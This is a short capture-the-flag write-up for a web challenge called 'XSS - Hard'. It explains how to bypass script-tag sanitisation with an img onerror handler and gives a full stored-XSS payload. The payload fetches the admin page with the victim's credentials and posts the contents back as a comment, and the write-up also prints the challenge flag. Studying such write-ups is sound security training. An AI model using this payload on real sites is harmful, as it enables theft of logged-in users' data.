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XSS - Hard

Category: Web


The admin has tried even harder to block JS on the blog.

Can you get the flag from the admin user? He's logged on right now


  • Continuing from the XSS - Easy and XSS - Medium challenges, we are no longer able to create comments with <script> tags as they get sanitized.
  • However, we can still invoke JavaScript logic through the <img> tag's onerror event handler.
  • Our payload should contain an <img> tag that points to an invalid URL, triggering the onerror event and invoking our malicious logic from the XSS - Medium challenge.
  • An example of the payload is:
    Text Only
    <img src=x onerror="fetch('/admin', {credentials:'include'}).then(res => res.text()).then(res => { let formData = new FormData(); formData.append('name', 'testing'); formData.append('comment', res); fetch('/new-comment', {method: 'POST', body:formData})});" />
  • After submitting our payload, we can refresh the page and view the flag in one of the blog post's comments.

Flag: punk_{RGQXJ27QYW15L7TJ}